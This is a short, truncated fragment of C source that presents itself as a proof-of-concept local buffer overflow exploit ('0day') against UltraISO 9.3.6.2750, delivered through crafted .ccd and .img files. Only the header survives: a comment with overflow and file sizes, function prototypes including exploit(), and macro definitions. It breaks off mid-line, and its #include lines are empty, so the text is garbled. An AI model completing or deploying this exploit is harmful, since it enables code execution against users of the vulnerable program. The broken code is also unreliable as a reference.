/*ccd overflow string=10974 bytes img file size=109974 bytes ccd file size=11812 */ #include #include #include void print(char*); unsigned int getFsize(FILE*,char*); void gen_random(char*,const int); void exploit(char*,char*); #define IM "testf.img" #define CC "testf.ccd" #define VER "9.3.6.2750" #define POCNAME "Ultraiso local buffer overflow POC(0day)" #define AUTHOR "fl0 fl0w" #define IF(x,NULL) if(x==NULL) #define FOR(i,a,b) for(i=a;i